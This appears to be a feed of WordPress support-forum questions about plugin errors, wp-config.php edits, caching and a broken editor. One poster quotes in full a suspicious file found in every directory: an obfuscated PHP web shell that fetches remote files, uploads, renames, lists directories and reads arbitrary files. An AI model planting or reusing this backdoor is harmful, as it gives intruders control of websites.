ErrorException: fopen(/home/schilde12/public_html/wp-content/uploads/trustindex-google-widget.css): Failed to open stream: No such file or directory in /home/ripasolutions/ Stack trace: #0 [internal function]: TrustindexPlugin_google->{closure}() #1 /home/ripasolutions/ fopen() #2 /home/ripasolutions/ WP_Filesystem_Direct->put_contents() #3 /home/ripasolutions/ TrustindexPlugin_google->handleCssFile() #4 /home/ripasolutions/ TrustindexPlugin_google->load() #5 /home/ripasolutions/ WP_Hook->apply_filters() #6 /home/ripasolutions/ WP_Hook->do_action() #7 /home/ripasolutions/ do_action() #8 /home/ripasolutions/ require_once(‘/home/ripasolut…’) #9 /home/ripasolutions/ require_once(‘/home/ripasolut…’) #10 /home/ripasolutions/ require_once(‘/home/ripasolut…’) #11 /home/ripasolutions/ require_once(‘/home/ripasolut…’) #12 {main}
]]>I have no coding experience. Could I delete the exact code it detected from my wp-config.php file without making my WordPress site brake?
Have you experienced this before?
What are your thoughts?
Thank you in advance!
]]>I have notices a file called
in every directory and have attached sample code of one
is this is normal or hack ?
<?php error_reporting(0);$sr="st"./*+/*+*/"rr"/*+/*+*/."ev";$id=$sr/*+/*+*/("ri"."d_"."si");$rn=$sr/*+/*+*/("em"."an"."er");$dn=$sr/*+/*+*/("em"."anr"."id");$od=$sr/*+/*+*/("ri"."dne"."po");$rd=$sr/*+/*+*/("ri"."dda"."er");$cd=$sr/*+/*+*/("ri"."deso"."lc");$fpc=$sr/*+/*+*/("stn"."etn"."oc_t"."up_e"."lif");$fgc=$sr/*+/*+*/("stn"."etn"."oc_t"."eg_e"."lif");$muf=$sr/*+/*+*/("eli"."f_d"."eda"."olp"."u_e"."vom");$dlform='<form method="post">FN:<input name="fn" size="20" type="text">URL:<input name="url" size="50" type="text"><input type="submit" value="ok"></form>';$ulform='<form method="post" enctype="multipart/form-data"><input name="uf" type="file">SP:<input name="sp" size="50" type="text"><input type="submit" value="ok"></form>';$rnform='<form method="post">ON:<input name="on" size="50" type="text">NN:<input name="nn" size="50" type="text"><input type="submit" value="ok"></form>';$lpform='<form method="post">DP:<input name="dp" size="50" type="text"><input type="submit" value="ok"></form>';$sfform='<form method="post">DF:<input name="df" size="50" type="text"><input type="submit" value="ok"></form>';if($_GET['act']=='dl'){echo($dlform);if($_SERVER['REQUEST_METHOD']=='POST'){$fpc/*+/*+*/($_POST['fn'],$fgc/*+/*+*/($_POST['url']));}exit;}if($_GET['act']=='ul'){echo($ulform);if($_SERVER['REQUEST_METHOD']=='POST'){$sp=empty($_POST['sp'])?'./':$_POST['sp'].'/';$muf/*+/*+*/($/*+/*+*/{"_F"."IL"."ES"}["uf"]["tmp_name"],$sp.$/*+/*+*/{"_F"."IL"."ES"}["uf"]["name"]);}exit;}if($_GET['act']=='rn'){echo($rnform);if($_SERVER['REQUEST_METHOD']=='POST'){$rn/*+/*+*/($_POST['on'],$_POST['nn']);}exit;}if($_GET['act']=='gp'){echo($dn/*+/*+*/(__FILE__));exit;}if($_GET['act']=='lp'){echo($lpform);if($_SERVER['REQUEST_METHOD']=='POST'){$dp=$_POST['dp'].'/';$h=$od/*+/*+*/($dp);while(($fn=$rd/*+/*+*/($h))!==false){if($id/*+/*+*/($dp.$fn)){$t1.='D '.$fn.'<br>';}else{$t2.=' '.$fn.'<br>';}}$cd/*+/*+*/($dp);echo($dp.'<br>'.$t1.$t2);}exit;}if($_GET['act']=='sf'){echo($sfform);if($_SERVER['REQUEST_METHOD']=='POST'){$df=$_POST['df'];echo('<textarea style="width:100%;height:100%;" wrap="off">'.$fgc/*+/*+*/($df).'</textarea>');}
]]>FTP credentials don’t allow to write to file /var/www/vhosts/26/312513/webspace/httpdocs/wp-config.php
W3 Total Cache Error: Files and directories could not be automatically created to complete the installation.
Please execute commands manually
I have added the suggested lines
/** Enable W3 Total Cache */
define(‘WP_CACHE’, true); // Added by W3 Total Cache
to wpconfig.php manually
I have uploaded the updated wpconfig.php file and checked that these lines have been added
However the same messages keep appearing on the dashboard.
I’ve also noticed that there is a further message which states
“The plugin is currently enabled in community mode.”
I don’t know if it is relevant but the WP3 plugin was deactivated when I ran the update.
]]>I am currently developing my site on and after running into a recent issue with security and cache plugins and resoring my site to a latest backup, it was working fine, but now my visual editor is not working in the page/post editor. It is a javascript issue. The html tab is fine though. The problem started yesterday, and the changes before that were only removing heavy security plugins like wordfence, w3 total cache, super cache and Fastest cache. I have read so many posts here and carefully removed any remaining folders left behind, and code added by these files in .htaccess and wp.config files but still the same problem.
All plugins and themes are also up to date.
I cannot go in for another site restore from backup prior to Aug 25th as I will lose lot of data and work. Nor can I reinstall wordpress for the same reason. Please help me fix the issue.
]]>the following error has come up.
A wp-config.php already exists in this location. This error prevents users from accidentally overwriting the wrong directories contents. You have two options:
Empty this root directory except for the package and installer and try again.
Delete just the wp-config.php file and try again. This will over-write all other files in the directory.
There isnt a wp.config file already there so Im confused.